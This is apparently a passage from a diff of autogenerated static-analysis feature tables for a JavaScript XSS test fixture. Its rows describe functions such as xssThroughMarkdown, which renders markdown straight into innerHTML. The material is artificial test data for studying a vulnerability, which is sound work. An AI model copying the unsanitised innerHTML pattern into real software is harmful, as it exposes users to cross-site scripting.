autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:1:24:1 | module. ... html;\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:8:21:14 | exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:8:21:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:8:21:14 | exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:16:21:33 | xssThroughMarkdown | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:16:21:33 | xssThroughMarkdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:16:21:33 | xssThroughMarkdown | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:21:36 | markdown | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:21:36 | markdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:21:36 | markdown | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:21:36 | markdown | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:21:36 | markdown | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:21:36 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:21:36 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:21:36 | this | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:21:36 | this | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:21:36 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:24:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:24:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:24:1 | 'arguments' object of anonymous function | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:24:1 | 'arguments' object of anonymous function | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:24:1 | 'arguments' object of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:24:1 | exceptional return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:24:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:24:1 | exceptional return of anonymous function | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:24:1 | exceptional return of anonymous function | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:24:1 | exceptional return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:24:1 | functio ... html;\\n} | assignedToPropName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:24:1 | functio ... html;\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:24:1 | functio ... html;\\n} | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:24:1 | functio ... html;\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:24:1 | return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:24:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:24:1 | return of anonymous function | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:24:1 | return of anonymous function | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:37:24:1 | return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:47:21:47 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:47:21:47 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:47:21:47 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:47:21:47 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:47:21:47 | s | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:47:21:47 | s | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:47:21:47 | s | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:47:21:47 | s | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:47:21:47 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:47:21:47 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:11:22:14 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:11:22:14 | html | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:11:22:14 | html | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:11:22:14 | html | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:11:22:14 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:11:22:35 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:11:22:35 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:11:22:35 | html | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:11:22:35 | html | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:11:22:35 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:11:22:35 | html = ... nder(s) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:11:22:35 | html = ... nder(s) | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:11:22:35 | html = ... nder(s) | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:11:22:35 | html = ... nder(s) | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:11:22:35 | html = ... nder(s) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:25 | markdown | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:25 | markdown | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:25 | markdown | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:25 | markdown | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:25 | markdown | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:32 | markdown.render | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:32 | markdown.render | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:32 | markdown.render | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:32 | markdown.render | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:32 | markdown.render | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:35 | exceptional return of markdown.render(s) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:35 | exceptional return of markdown.render(s) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:35 | exceptional return of markdown.render(s) | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:35 | exceptional return of markdown.render(s) | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:35 | exceptional return of markdown.render(s) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:35 | markdown.render(s) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:35 | markdown.render(s) | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:35 | markdown.render(s) | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:35 | markdown.render(s) | enclosingFunctionName | xssThroughMarkdown | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:18:22:35 | markdown.render(s) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:27:22:32 | render | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:27:22:32 | render | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:27:22:32 | render | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:27:22:32 | render | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:27:22:32 | render | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:34:22:34 | s | CalleeFlexibleAccessPath | markdown.render | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:34:22:34 | s | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:34:22:34 | s | calleeImports | markdown-it | @@ -22919,6 +151343,41 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:34:22:34 | s | enclosingFunctionName | xssThroughMarkdown | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:34:22:34 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:22:34:22:34 | s | receiverName | markdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:12 | document | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:12 | document | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:12 | document | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:12 | document | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:12 | document | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:26 | documen ... elector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:26 | documen ... elector | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:26 | documen ... elector | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:26 | documen ... elector | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:26 | documen ... elector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:39 | documen ... kdown") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:39 | documen ... kdown") | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:39 | documen ... kdown") | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:39 | documen ... kdown") | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:39 | documen ... kdown") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:39 | exceptional return of documen ... kdown") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:39 | exceptional return of documen ... kdown") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:39 | exceptional return of documen ... kdown") | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:39 | exceptional return of documen ... kdown") | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:39 | exceptional return of documen ... kdown") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:49 | documen ... nerHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:49 | documen ... nerHTML | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:49 | documen ... nerHTML | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:49 | documen ... nerHTML | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:49 | documen ... nerHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:56 | documen ... = html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:56 | documen ... = html | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:56 | documen ... = html | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:56 | documen ... = html | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:5:23:56 | documen ... = html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:14:23:26 | querySelector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:14:23:26 | querySelector | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:14:23:26 | querySelector | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:14:23:26 | querySelector | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:14:23:26 | querySelector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:28:23:38 | "#markdown" | CalleeFlexibleAccessPath | document.querySelector | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:28:23:38 | "#markdown" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:28:23:38 | "#markdown" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -22927,22 +151386,124 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:28:23:38 | "#markdown" | enclosingFunctionName | xssThroughMarkdown | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:28:23:38 | "#markdown" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:28:23:38 | "#markdown" | receiverName | document | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:23:41:23:49 | innerHTML | contextFunctionInterfaces | 